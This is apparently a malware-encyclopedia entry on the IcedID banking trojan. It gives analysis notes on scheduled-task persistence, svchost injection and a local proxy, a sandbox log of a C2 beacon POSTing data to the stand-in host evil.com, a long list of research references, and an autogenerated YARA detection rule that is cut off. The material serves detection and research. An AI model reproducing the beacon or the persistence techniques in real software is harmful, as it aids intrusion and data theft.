IcedID (Malware Family)

SYMBOL	COMMON_NAME	aka. SYNONYMS

win.icedid (Back to overview)

IcedID

aka: BokBot, IceID

Actor(s): GOLD CABIN, Lunar Spider

URLhaus

Analysis Observations:

* It sets up persistence by creating a Scheduled Task with the following characteristics:
* Name: Update
* Trigger: At Log on
* Action: %LocalAppData%\$Example\\waroupada.exe /i
* Conditions: Stop if the computer ceases to be idle.
* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.
* The filename remained static during analysis.
* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it
* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.
* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.
* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:
rundll32.exe kernel32,Sleep -s
* Setup a local listener to proxy traffic on 127.0.0.1:50000

**[Example Log from C2 Network Communication]**
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2

References

2022-09-07 ⋅ Google ⋅ Pierre-Marc Bureau, Google Threat Analysis Group
Initial access broker repurposing techniques in targeted attacks against Ukraine
AnchorMail Cobalt Strike IcedID

2022-08-12 ⋅ SANS ISC ⋅ Brad Duncan
Monster Libra (TA551/Shathak) pushes IcedID (Bokbot) with Dark VNC and Cobalt Strike
Cobalt Strike DarkVNC IcedID

2022-08-04 ⋅ Medium walmartglobaltech ⋅ Joshua Platt, Jason Reaves
IcedID leverages PrivateLoader
IcedID PrivateLoader

2022-07-27 ⋅ SANS ISC ⋅ Brad Duncan
IcedID (Bokbot) with Dark VNC and Cobalt Strike
DarkVNC IcedID

2022-07-18 ⋅ Palo Alto Networks Unit 42 ⋅ Unit 42
Monster Libra
Valak IcedID GOLD CABIN

2022-07-17 ⋅ Resecurity ⋅ Resecurity
Shortcut-Based (LNK) Attacks Delivering Malicious Code On The Rise
AsyncRAT BumbleBee Emotet IcedID QakBot

2022-07-07 ⋅ IBM ⋅ Ole Villadsen, Charlotte Hammond, Kat Weinberger
Unprecedented Shift: The Trickbot Group is Systematically Attacking Ukraine
AnchorMail BumbleBee Cobalt Strike IcedID Meterpreter

2022-06-24 ⋅ Soc Investigation ⋅ BalaGanesh
IcedID Banking Trojan returns with new TTPS – Detection & Response
IcedID

2022-06-21 ⋅ McAfee ⋅ Lakshya Mathur
Rise of LNK (Shortcut files) Malware
BazarBackdoor Emotet IcedID QakBot

2022-05-30 ⋅ Matthieu Walter
Automatically Unpacking IcedID Stage 1 with Angr
IcedID

2022-05-19 ⋅ IBM ⋅ Charlotte Hammond, Ole Villadsen, Golo Mühr
ITG23 Crypters Highlight Cooperation Between Cybercriminal Groups
IcedID ISFB Mount Locker

2022-05-17 ⋅ Trend Micro ⋅ Trend Micro Research
Ransomware Spotlight: RansomEXX
LaZagne Cobalt Strike IcedID MimiKatz PyXie RansomEXX TrickBot

2022-05-12 ⋅ Intel 471 ⋅ Intel 471
What malware to look for if you want to prevent a ransomware attack
Conti BumbleBee Cobalt Strike IcedID Sliver

2022-05-11 ⋅ InfoSec Handlers Diary Blog ⋅ Brad Duncan
TA578 using thread-hijacked emails to push ISO files for Bumblebee malware
BumbleBee Cobalt Strike IcedID PhotoLoader

2022-05-09 ⋅ Microsoft ⋅ Microsoft 365 Defender Threat Intelligence Team, Microsoft Threat Intelligence Center (MSTIC)
Ransomware-as-a-service: Understanding the cybercrime gig economy and how to protect yourself
AnchorDNS BlackCat BlackMatter Conti DarkSide HelloKitty Hive LockBit REvil FAKEUPDATES Griffon ATOMSILO BazarBackdoor BlackCat BlackMatter Blister Cobalt Strike Conti DarkSide Emotet FiveHands Gozi HelloKitty Hive IcedID ISFB JSSLoader LockBit LockFile Maze NightSky Pandora Phobos Phoenix Locker PhotoLoader QakBot REvil Rook Ryuk SystemBC TrickBot WastedLocker BRONZE STARLIGHT

2022-05-09 ⋅ Cybereason ⋅ Lior Rochberger
Cybereason vs. Quantum Locker Ransomware
IcedID Mount Locker

2022-05-04 ⋅ Twitter (@felixw3000) ⋅ Felix
Twitter Thread with info on infection chain with IcedId, Cobalt Strike, and Hidden VNC.
Cobalt Strike IcedID PhotoLoader

2022-04-28 ⋅ Symantec ⋅ Karthikeyan C Kasiviswanathan, Vishal Kamble
Ransomware: How Attackers are Breaching Corporate Networks
AvosLocker Conti Emotet Hive IcedID PhotoLoader QakBot TrickBot

2022-04-26 ⋅ Intel 471 ⋅ Intel 471
Conti and Emotet: A constantly destructive duo
Cobalt Strike Conti Emotet IcedID QakBot TrickBot

2022-04-25 ⋅ The DFIR Report ⋅ The DFIR Report
Quantum Ransomware
Cobalt Strike IcedID

2022-04-17 ⋅ BushidoToken Blog ⋅ BushidoToken
Lessons from the Conti Leaks
BazarBackdoor Conti Emotet IcedID Ryuk TrickBot

2022-04-14 ⋅ Bleeping Computer ⋅ Bill Toulas
Hackers target Ukrainian govt with IcedID malware, Zimbra exploits
IcedID

2022-04-14 ⋅ Cert-UA ⋅ Cert-UA
Cyberattack on Ukrainian state organizations using IcedID malware (CERT-UA#4464)
IcedID

2022-04-04 ⋅ The DFIR Report ⋅ @0xtornado, @yatinwad, @MettalicHack, @_pete_0
Stolen Images Campaign Ends in Conti Ransomware
Conti IcedID

2022-03-31 ⋅ Trellix ⋅ John Fokker, Jambul Tologonov
Conti Leaks: Examining the Panama Papers of Ransomware
LockBit Amadey Buer Conti IcedID LockBit Mailto Maze PhotoLoader Ryuk TrickBot

2022-03-29 ⋅ Threat Post ⋅ Elizabeth Montalbano
Exchange Servers Speared in IcedID Phishing Campaign
IcedID

2022-03-28 ⋅ Fortinet ⋅ James Slaughter, Val Saengphaibul, Fred Gutierrez
Spoofed Invoice Used to Drop IcedID
IcedID

2022-03-28 ⋅ Intezer ⋅ Joakim Kennedy, Ryan Robinson
New Conversation Hijacking Campaign Delivering IcedID
IcedID PhotoLoader

2022-03-28 ⋅ Bleeping Computer ⋅ Bill Toulas
Microsoft Exchange targeted for IcedID reply-chain hijacking attacks
IcedID

2022-03-23 ⋅ Secureworks ⋅ Counter Threat Unit ResearchTeam
Threat Intelligence Executive Report Volume 2022, Number 2
Conti Emotet IcedID TrickBot

2022-03-23 ⋅ Secureworks ⋅ Counter Threat Unit ResearchTeam
GOLD ULRICK Leaks Reveal Organizational Structure and Relationships
Conti Emotet IcedID TrickBot

2022-03-21 ⋅ eSentire ⋅ eSentire Threat Response Unit (TRU)
Conti Affiliate Exposed: New Domain Names, IP Addresses and Email Addresses Uncovered
HelloKitty BazarBackdoor Cobalt Strike Conti FiveHands HelloKitty IcedID

2022-03-17 ⋅ Trend Micro ⋅ Trend Micro Research
Navigating New Frontiers Trend Micro 2021 Annual Cybersecurity Report
REvil BazarBackdoor Buer IcedID QakBot REvil

2022-03-17 ⋅ Github (eln0ty) ⋅ Abdallah Elnoty
IcedID Analysis
IcedID

2022-03-09 ⋅ nikpx ⋅ xors
BokBot Technical Analysis
IcedID

2022-02-22 ⋅ eSentire ⋅ eSentire Threat Response Unit (TRU)
IcedID to Cobalt Strike In Under 20 Minutes
Cobalt Strike IcedID PhotoLoader

2022-02-10 ⋅ Cybereason ⋅ Cybereason Global SOC Team
Threat Analysis Report: All Paths Lead to Cobalt Strike - IcedID, Emotet and QBot
Cobalt Strike Emotet IcedID QakBot

2022-01-18 ⋅ Recorded Future ⋅ Insikt Group®
2021 Adversary Infrastructure Report
BazarBackdoor Cobalt Strike Dridex IcedID QakBot TrickBot

2022-01-01 ⋅ forensicitguy ⋅ Tony Lambert
Analyzing an IcedID Loader Document
IcedID

2021-12-16 ⋅ InfoSec Handlers Diary Blog ⋅ Brad Duncan
How the "Contact Forms" campaign tricks people
IcedID

2021-12-03 ⋅ SANS ISC InfoSec Forums ⋅ Brad Duncan
TA551 (Shathak) pushes IcedID (Bokbot)
IcedID

2021-11-16 ⋅ IronNet ⋅ IronNet Threat Research, Morgan Demboski, Joey Fitzpatrick, Peter Rydzynski
How IronNet's Behavioral Analytics Detect REvil and Conti Ransomware
Cobalt Strike Conti IcedID REvil

2021-11-12 ⋅ Recorded Future ⋅ Insikt Group®
The Business of Fraud: Botnet Malware Dissemination
Mozi Dridex IcedID QakBot TrickBot

2021-11-04 ⋅ splunk ⋅ Splunk Threat Research Team
Detecting IcedID... Could It Be A Trickbot Copycat?
IcedID

2021-11-03 ⋅ Team Cymru ⋅ tcblogposts
Webinject Panel Administration: A Vantage Point into Multiple Threat Actor Campaigns - A Case Study on the Value of Threat Reconnaisance
DoppelDridex IcedID QakBot Zloader

2021-10-18 ⋅ The DFIR Report ⋅ The DFIR Report
IcedID to XingLocker Ransomware in 24 hours
Cobalt Strike IcedID Mount Locker

2021-10-15 ⋅ Trend Micro ⋅ Fernando Mercês
Ransomware Operators Found Using New "Franchise" Business Model
Glupteba IcedID Mount Locker

2021-09-03 ⋅ Trend Micro ⋅ Mohamad Mokbel
The State of SSL/TLS Certificate Usage in Malware C&C Communications
AdWind ostap AsyncRAT BazarBackdoor BitRAT Buer Chthonic CloudEyE Cobalt Strike DCRat Dridex FindPOS GootKit Gozi IcedID ISFB Nanocore RAT Orcus RAT PandaBanker Qadars QakBot Quasar RAT Rockloader ServHelper Shifu SManager TorrentLocker TrickBot Vawtrak Zeus Zloader

2021-08-15 ⋅ Symantec ⋅ Threat Hunter Team
The Ransomware Threat
Babuk BlackMatter DarkSide Avaddon Babuk BADHATCH BazarBackdoor BlackMatter Clop Cobalt Strike Conti DarkSide DoppelPaymer Egregor Emotet FiveHands FriedEx Hades IcedID LockBit Maze MegaCortex MimiKatz QakBot RagnarLocker REvil Ryuk TrickBot WastedLocker

2021-08-05 ⋅ Group-IB ⋅ Viktor Okorokov, Nikita Rostovcev
Prometheus TDS The key to success for Campo Loader, Hancitor, IcedID, and QBot
Prometheus Backdoor Buer campoloader Hancitor IcedID QakBot

2021-08-05 ⋅ The Record ⋅ Catalin Cimpanu
Meet Prometheus, the secret TDS behind some of today’s malware campaigns
Buer campoloader IcedID QakBot

2021-07-30 ⋅ HP ⋅ Patrick Schläpfer
Detecting TA551 domains
Valak Dridex IcedID ISFB QakBot

2021-07-26 ⋅ vmware ⋅ Quentin Fois, Pavankumar Chaudhari
Hunting IcedID and unpacking automation with Qiling
IcedID

2021-07-23 ⋅ Github (Lastline-Inc) ⋅ Quentin Fois, Pavankumar Chaudhari
YARA rules, IOCs and Scripts for extracting IcedID C2s
IcedID

2021-07-19 ⋅ The DFIR Report ⋅ The DFIR Report
IcedID and Cobalt Strike vs Antivirus
Cobalt Strike IcedID

2021-07-14 ⋅ Cerium Networks ⋅ Blumira
Threat of the Month: IcedID Malware
IcedID

2021-07-08 ⋅ vmware ⋅ Quentin Fois, Pavankumar Chaudhari
IcedID: Analysis and Detection
IcedID

2021-06-30 ⋅ Cynet ⋅ Max Malyutin
Shelob Moonlight – Spinning a Larger Web From IcedID to CONTI, a Trojan and Ransomware collaboration
Conti IcedID

2021-06-24 ⋅ SentinelOne ⋅ Marco Figueroa
Evasive Maneuvers | Massive IcedID Campaign Aims For Stealth with Benign Macros
IcedID

2021-06-24 ⋅ Kaspersky ⋅ Anton Kuzmenko
Malicious spam campaigns delivering banking Trojans
IcedID QakBot

2021-06-20 ⋅ The DFIR Report ⋅ The DFIR Report
From Word to Lateral Movement in 1 Hour
Cobalt Strike IcedID

2021-06-16 ⋅ Proofpoint ⋅ Selena Larson, Daniel Blackford, Garrett M. Graff
The First Step: Initial Access Leads to Ransomware
BazarBackdoor Egregor IcedID Maze QakBot REvil Ryuk TrickBot WastedLocker

2021-05-29 ⋅ Youtube (AhmedS Kasmani) ⋅ AhmedS Kasmani
Analysis of ICEID Malware Installer DLL
IcedID

2021-05-26 ⋅ Check Point ⋅ Alex Ilgayev
Melting Ice – Tracking IcedID Servers with a few simple steps
IcedID

2021-05-19 ⋅ Team Cymru ⋅ Josh Hopkins, Andy Kraus, Nick Byers
Tracking BokBot Infrastructure Mapping a Vast and Currently Active BokBot Network
IcedID

2021-05-18 ⋅ RECON INFOSEC ⋅ Andrew Cook
An Encounter With TA551/Shathak
IcedID

2021-05-17 ⋅ Telekom ⋅ Thomas Barabosch
Let’s set ice on fire: Hunting and detecting IcedID infections
IcedID

2021-05-17 ⋅ Github (telekom-security) ⋅ Deutsche Telekom Security GmbH
icedid_analysis
IcedID

2021-05-12 ⋅ The DFIR Report
Conti Ransomware
Cobalt Strike Conti IcedID

2021-05-10 ⋅ MALWATION ⋅ malwation
IcedID Malware Technical Analysis Report
IcedID

2021-04-19 ⋅ Netresec ⋅ Erik Hjelmvik
Analysing a malware PCAP with IcedID and Cobalt Strike traffic
Cobalt Strike IcedID

2021-04-17 ⋅ YouTube (Worcester DEFCON Group) ⋅ Joel Snape, Nettitude
Inside IcedID: Anatomy Of An Infostealer
IcedID

2021-04-13 ⋅ Silent Push ⋅ Martijn Grooten
Malicious infrastructure as a service
IcedID PhotoLoader QakBot

2021-04-12 ⋅ Trend Micro ⋅ Raphael Centeno, Don Ovid Ladores, Lala Manly, Junestherry Salvador, Frankylnn Uy
A Spike in BazarCall and IcedID Activity Detected in March
BazarBackdoor IcedID

2021-04-11 ⋅ 4rchibld ⋅ 4rchibld
IcedID on my neck I’m the coolest
IcedID

2021-04-10 ⋅ Youtube (AhmedS Kasmani) ⋅ AhmedS Kasmani
Malware Analysis: IcedID Banking Trojan JavaScript Dropper
IcedID

2021-04-09 ⋅ Microsoft ⋅ Emily Hacker, Justin Carroll, Microsoft 365 Defender Threat Intelligence Team
Investigating a unique “form” of email delivery for IcedID malware
IcedID

2021-04-09 ⋅ aaqeel01 ⋅ Ali Aqeel
IcedID Analysis
IcedID

2021-04-07 ⋅ Uptycs ⋅ Ashwin Vamshi, Abhijit Mohanta
IcedID campaign spotted being spiced with Excel 4 Macros
IcedID

2021-04-07 ⋅ Minerva ⋅ Minerva Labs
IcedID - A New Threat In Office Attachments
IcedID

2021-04-01 ⋅ Reversing Labs ⋅ Robert Simmons
Code Reuse Across Packers and DLL Loaders
IcedID SystemBC

2021-03-31 ⋅ Red Canary ⋅ Red Canary
2021 Threat Detection Report
Shlayer Andromeda Cobalt Strike Dridex Emotet IcedID MimiKatz QakBot TrickBot

2021-03-31 ⋅ Silent Push ⋅ Martijn Grooten
IcedID Command and Control Infrastructure
IcedID PhotoLoader

2021-03-29 ⋅ The DFIR Report ⋅ The DFIR Report
Sodinokibi (aka REvil) Ransomware
Cobalt Strike IcedID REvil

2021-03-12 ⋅ Binary Defense ⋅ James Quinn
IcedID GZIPLOADER Analysis
IcedID

2021-03-04 ⋅ F5 ⋅ Dor Nizar, Roy Moshailov
IcedID Banking Trojan Uses COVID-19 Pandemic to Lure New Victims
IcedID

2021-03 ⋅ Group-IB ⋅ Oleg Skulkin, Roman Rezvukhin, Semyon Rogachev
Ransomware Uncovered 2020/2021
RansomEXX BazarBackdoor Buer Clop Conti DoppelPaymer Dridex Egregor IcedID Maze PwndLocker QakBot RansomEXX REvil Ryuk SDBbot TrickBot Zloader

2021-02-26 ⋅ CrowdStrike ⋅ Eric Loui, Sergei Frankoff
Hypervisor Jackpotting: CARBON SPIDER and SPRITE SPIDER Target ESXi Servers With Ransomware to Maximize Impact
DarkSide RansomEXX Griffon Carbanak Cobalt Strike DarkSide IcedID MimiKatz PyXie RansomEXX REvil

2021-02-25 ⋅ FireEye ⋅ Bryce Abdo, Brendan McKeague, Van Ta
So Unchill: Melting UNC2198 ICEDID to Ransomware Operations
MOUSEISLAND Cobalt Strike Egregor IcedID Maze SystemBC

2021-02-23 ⋅ CrowdStrike ⋅ CrowdStrike
2021 Global Threat Report
RansomEXX Amadey Anchor Avaddon BazarBackdoor Clop Cobalt Strike Conti Cutwail DanaBot DarkSide DoppelPaymer Dridex Egregor Emotet Hakbit IcedID JSOutProx KerrDown LockBit Mailto Maze MedusaLocker Mespinoza Mount Locker NedDnLoader Nemty Pay2Key PlugX Pushdo PwndLocker PyXie QakBot Quasar RAT RagnarLocker Ragnarok RansomEXX REvil Ryuk Sekhmet ShadowPad SmokeLoader Snake SUNBURST SunCrypt TEARDROP TrickBot WastedLocker Winnti Zloader KNOCKOUT SPIDER OUTLAW SPIDER RIDDLE SPIDER SOLAR SPIDER VIKING SPIDER

2021-02-03 ⋅ Mimecast, Nettitude
TA551/Shathak Threat Research
IcedID

2021-02-02 ⋅ CRONUP ⋅ Germán Fernández
De ataque con Malware a incidente de Ransomware
Avaddon BazarBackdoor Buer Clop Cobalt Strike Conti DanaBot Dharma Dridex Egregor Emotet Empire Downloader FriedEx GootKit IcedID MegaCortex Nemty Phorpiex PwndLocker PyXie QakBot RansomEXX REvil Ryuk SDBbot SmokeLoader TrickBot Zloader

2021-01-19 ⋅ Palo Alto Networks Unit 42 ⋅ Brad Duncan
Wireshark Tutorial: Examining Emotet Infection Traffic
Emotet GootKit IcedID QakBot TrickBot

2021-01-19 ⋅ Medium elis531989 ⋅ Eli Salem
Funtastic Packers And Where To Find Them
Get2 IcedID QakBot

2021-01-18 ⋅ tccontre Blog ⋅ tcontre
Extracting Shellcode in ICEID .PNG Steganography
IcedID

2021-01-09 ⋅ Marco Ramilli's Blog ⋅ Marco Ramilli
Command and Control Traffic Patterns
ostap LaZagne Agent Tesla Azorult Buer Cobalt Strike DanaBot DarkComet Dridex Emotet Formbook IcedID ISFB NetWire RC PlugX Quasar RAT SmokeLoader TrickBot

2021-01-07 ⋅ Palo Alto Networks Unit 42 ⋅ Brad Duncan
TA551: Email Attack Campaign Switches from Valak to IcedID
IcedID

2021 ⋅ AWAKE ⋅ Awake Security
Breaking the Ice: Detecting IcedID and Cobalt Strike Beacon with Network Detection and Response (NDR)
Cobalt Strike IcedID PhotoLoader

2020-12-10 ⋅ NRI SECURE ⋅ NeoSOC
マルウェア「IcedID」の検知傾向と感染に至るプロセスを徹底解説
IcedID

2020-12-09 ⋅ Cisco ⋅ David Liebenberg, Caitlin Huey
Quarterly Report: Incident Response trends from Fall 2020
Cobalt Strike IcedID Maze RansomEXX Ryuk

2020-12-09 ⋅ Microsoft ⋅ Microsoft 365 Defender Research Team
EDR in block mode stops IcedID cold
IcedID

2020-12-02 ⋅ CyberInt ⋅ Cyberint Research
IcedID Stealer Man-in-the-browser Banking Trojan
IcedID

2020-11-26 ⋅ Cybereason ⋅ Lior Rochberger, Cybereason Nocturnus
Cybereason vs. Egregor Ransomware
Cobalt Strike Egregor IcedID ISFB QakBot

2020-09-29 ⋅ Microsoft ⋅ Microsoft
Microsoft Digital Defense Report
Emotet IcedID Mailto Maze QakBot REvil RobinHood TrickBot

2020-08-16 ⋅ kienmanowar Blog ⋅ m4n0w4r
Manual Unpacking IcedID Write-up
IcedID

2020-08-12 ⋅ Juniper ⋅ Paul Kimayong
IcedID Campaign Strikes Back
IcedID

2020-08-10 ⋅ tccontre Blog ⋅ tccontre
Learning From ICEID loader - Including its Steganography Payload Parsing
IcedID

2020-07-30 ⋅ Spamhaus ⋅ Spamhaus Malware Labs
Spamhaus Botnet Threat Update Q2 2020
AdWind Agent Tesla Arkei Stealer AsyncRAT Ave Maria Azorult DanaBot Emotet IcedID ISFB KPOT Stealer Loki Password Stealer (PWS) Nanocore RAT NetWire RC NjRAT Pony Raccoon RedLine Stealer Remcos Zloader

2020-07-01 ⋅ Cisco Talos ⋅ Nick Biasini, Edmund Brumaghin, Mariano Graziano
Threat Spotlight: Valak Slithers Its Way Into Manufacturing and Transportation Networks
Valak IcedID ISFB MyKings Spreader

2020-06-22 ⋅ zero2auto ⋅ Daniel Bunce
Unpacking Visual Basic Packers – IcedID
IcedID

2020-06-18 ⋅ Juniper ⋅ Paul Kimayong
COVID-19 and FMLA Campaigns used to install new IcedID banking malware
IcedID

2020-06-17 ⋅ Github (f0wl) ⋅ Marius Genheimer
deICEr: A Go tool for extracting config from IcedID second stage Loaders
IcedID

2020-05-29 ⋅ Group-IB ⋅ Ivan Pisarev
IcedID: When ice burns through bank accounts
IcedID

2020-03-04 ⋅ CrowdStrike ⋅ CrowdStrike
2020 CrowdStrike Global Threat Report
MESSAGETAP More_eggs 8.t Dropper Anchor BabyShark BadNews Clop Cobalt Strike CobInt Cobra Carbon System Cutwail DanaBot Dharma DoppelDridex DoppelPaymer Dridex Emotet FlawedAmmyy FriedEx Gandcrab Get2 IcedID ISFB KerrDown LightNeuron LockerGoga Maze MECHANICAL Necurs Nokki Outlook Backdoor Phobos Predator The Thief QakBot REvil RobinHood Ryuk SDBbot Skipper SmokeLoader TerraRecon TerraStealer TerraTV TinyLoader TrickBot Vidar Winnti ANTHROPOID SPIDER APT23 APT31 APT39 APT40 BlackTech BuhTrap Charming Kitten CLOCKWORK SPIDER DOPPEL SPIDER FIN7 Gamaredon Group GOBLIN PANDA MONTY SPIDER MUSTANG PANDA NARWHAL SPIDER NOCTURNAL SPIDER PINCHY SPIDER SALTY SPIDER SCULLY SPIDER SMOKY SPIDER Thrip VENOM SPIDER VICEROY TIGER

2020-02-18 ⋅ Sophos Labs ⋅ Luca Nagy
Nearly a quarter of malware now communicates using TLS
Dridex IcedID TrickBot

2020-01-22 ⋅ Thomas Barabosch
The malware analyst’s guide to PE timestamps
Azorult Gozi IcedID ISFB LOLSnif SUNBURST TEARDROP

2020 ⋅ Secureworks ⋅ SecureWorks
GOLD SWATHMORE
GlobeImposter Gozi IcedID TrickBot LUNAR SPIDER

2019-12-18 ⋅ Github (psrok1) ⋅ Paweł Srokosz
IcedID PNG Extractor
IcedID

2019-12-12 ⋅ FireEye ⋅ Chi-en Shen, Oleg Bondarenko
Cyber Threat Landscape in Japan – Revealing Threat in the Shadow
Cerberus TSCookie Cobalt Strike Dtrack Emotet Formbook IcedID Icefog IRONHALO Loki Password Stealer (PWS) PandaBanker PLEAD poisonplug TrickBot BlackTech

2019-12-03 ⋅ Malwarebytes ⋅ Threat Intelligence Team
New version of IcedID Trojan uses steganographic payloads
IcedID

2019-07-09 ⋅ Fortinet ⋅ Kai Lu
A Deep Dive Into IcedID Malware: Part I - Unpacking, Hooking and Process Injection
IcedID

2019-06-25 ⋅ Dawid Golak
IcedID aka #Bokbot Analysis with Ghidra
IcedID

2019-06-16 ⋅ Fortinet ⋅ Kai Lu
A Deep Dive Into IcedID Malware: Part II - Analysis of the Core IcedID Payload (Parent Process)
IcedID

2019-04-04 ⋅ SecurityIntelligence ⋅ Nir Somech, Limor Kessem
IcedID Banking Trojan Spruces Up Injection Tactics to Add Stealth
IcedID

2019-03-21 ⋅ CrowdStrike ⋅ Shaun Hurley, James Scalise
Interception: Dissecting BokBot’s “Man in the Browser”
IcedID

2019-02-15 ⋅ CrowdStrike ⋅ Brendon Feeley, Bex Hartley
“Sin”-ful SPIDERS: WIZARD SPIDER and LUNAR SPIDER Sharing the Same Web
Dyre IcedID TrickBot Vawtrak LUNAR SPIDER WIZARD SPIDER

2019-02-06 ⋅ SecurityIntelligence ⋅ Itzik Chimino, Limor Kessem, Ophir Harpaz
IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites
IcedID

2019-01-03 ⋅ CrowdStrike ⋅ Shaun Hurley, James Scalise
Digging into BokBot’s Core Module
IcedID

2018-11-09 ⋅ Youtube (OALabs) ⋅ Sean Wilson, Sergei Frankoff
Reverse Engineering IcedID / Bokbot Malware Part 2
IcedID

2018-10-26 ⋅ Youtube (OALabs) ⋅ Sergei Frankoff
Unpacking Bokbot / IcedID Malware - Part 1
IcedID

2018-09-07 ⋅ Vitali Kremez
Let's Learn: Deeper Dive into "IcedID"/"BokBot" Banking Malware: Part 1
IcedID

2018-08-09 ⋅ Fox-IT ⋅ Alfred Klason
Bokbot: The (re)birth of a banker
IcedID Vawtrak

2018-04-10 ⋅ Cisco Talos ⋅ Ross Gibb, Daphne Galme, Michael Gorelik
IcedID Banking Trojan Teams up with Ursnif/Dreambot for Distribution
IcedID

2017-11-14 ⋅ Digital Guardian ⋅ Chris Brook
IceID Banking Trojan Targeting Banks, Payment Card Providers, E-Commerce Sites
IcedID

2017-11-13 ⋅ Intezer ⋅ Jay Rosenberg
IcedID Banking Trojan Shares Code with Pony 2.0 Trojan
IcedID IcedID Downloader

2017-11-13 ⋅ SecurityIntelligence ⋅ Limor Kessem, Maor Wiesen, Tal Darsan, Tomer Agayev
New Banking Trojan IcedID Discovered by IBM X-Force Research
IcedID IcedID Downloader

Yara Rules

[TLP:WHITE] win_icedid_auto (20220808 | Detects win.icedid.)

rule win_icedid_auto {

    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2022-08-05"
        version = "1"
        description = "Detects win.icedid."
        info = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator v0.6.0"
        signator_config = "callsandjumps;datarefs;binvalue"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid"
        malpedia_rule_date = "20220805"
        malpedia_hash = "6ec06c64bcfdbeda64eff021c766b4ce34542b71"
        malpedia_version = "20220808"
        malpedia_license = "CC BY-SA 4.0"
        malpedia_sharing = "TLP:WHITE"

    /* DISCLAIMER
     * The strings used in this rule have been automatically selected from the
     * disassembly of memory dumps and unpacked files, using YARA-Signator.
     * The code and documentation is published here:
     * https://github.com/fxb-cocacoding/yara-signator
     * As Malpedia is used as data source, please note that for a given
     * number of families, only single samples are documented.
     * This likely impacts the degree of generalization these rules will offer.
     * Take the described generation method also into consideration when you
     * apply the rules in your use cases and assign them confidence levels.
     */


    strings:
        $sequence_0 = { 68???????? 6a00 ff15???????? 33c0 40 }
            // n = 5, score = 1300
            //   68????????           |                     
            //   6a00                 | push                0
            //   ff15????????         |                     
            //   33c0                 | xor                 eax, eax
            //   40                   | inc                 eax

        $sequence_1 = { 0fb60d???????? 50 0fb605???????? 50 0fb605???????? 50 }
            // n = 6, score = 1300
            //   0fb60d????????       |                     
            //   50                   | push                eax
            //   0fb605????????       |                     
            //   50                   | push                eax
            //   0fb605????????       |                     
            //   50                   | push                eax

        $sequence_2 = { 742c 803e00 7427 6a3b 56 ff15???????? 8bf8 }
            // n = 7, score = 1300
            //   742c                 | je                  0x2e
            //   803e00               | cmp                 byte ptr [esi], 0
            //   7427                 | je                  0x29
            //   6a3b                 | push                0x3b
            //   56                   | push                esi
            //   ff15????????         |                     
            //   8bf8                 | mov                 edi, eax

        $sequence_3 = { 55 8bec 56 8d4510 50 ff750c 6a00 }
            // n = 7, score = 1300
            //   55                   | push                ebp
            //   8bec                 | mov                 ebp, esp
            //   56                   | push                esi
            //   8d4510               | lea                 eax, [ebp + 0x10]
            //   50                   | push                eax
            //   ff750c               | push                dword ptr [ebp + 0xc]
            //   6a00                 | push                0

        $sequence_4 = { ff15???????? 85c0 7511 56 57 }
            // n = 5, score = 1300
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   7511                 | jne                 0x13
            //   56                   | push                esi
            //   57                   | push                edi

        $sequence_5 = { d1c8 f7d0 d1c8 2d20010000 d1c0 f7d0 2d01910000 }
            // n = 7, score = 1300
            //   d1c8                 | ror                 eax, 1
            //   f7d0                 | not                 eax
